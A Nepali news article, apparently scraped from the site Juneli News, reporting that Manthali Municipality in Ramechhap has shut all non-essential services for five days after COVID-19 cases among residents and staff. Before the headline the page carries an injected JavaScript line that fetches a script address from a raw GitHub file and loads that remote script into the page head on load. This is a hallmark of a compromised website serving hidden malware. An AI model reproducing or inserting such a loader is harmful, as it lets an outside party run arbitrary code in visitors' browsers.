;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); मन्थली नगरपालिकाको आत्यवश्य बाहेक सबै सेवा ५ दिनका लागि बन्द – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • मन्थली नगरपालिकाको आत्यवश्य बाहेक सबै सेवा ५ दिनका लागि बन्द
रामेछाप बिशेष

मन्थली नगरपालिकाको आत्यवश्य बाहेक सबै सेवा ५ दिनका लागि बन्द

असोज २७,

रामेछाप । रामेछापको मन्थली नगरपालिकाले अत्यावश्य बाहेक सबै सेवा बन्द गरेको छ । भोली बुधबारदेखि लागू हुने गरी कात्तिक २ गतेसम्मको लागि नगरपालिका पूर्ण रुपमा बन्द हुने जनाकारी नगर प्रमुख रमेश कुमार बस्नेतले हस्ताक्षर गरेको सूचनामा उल्लेख छ ।

मंगलबार एकदिन नगरपालिका भित्रका २० जनामा कोरोनादेखिदा नगरका कर्मचारीलाई संक्रमण देखिदा सेवा बन्द गरेको नगरले सूचना जारी गरि जनाएको छ ।

साथै नगरभित्रका सबै वडा कार्यालयबाट प्रवाह हुने सेवा पनि बन्द गरेको नगरले जनाएको छ ।

फेसबुक प्रतिक्रियाहरु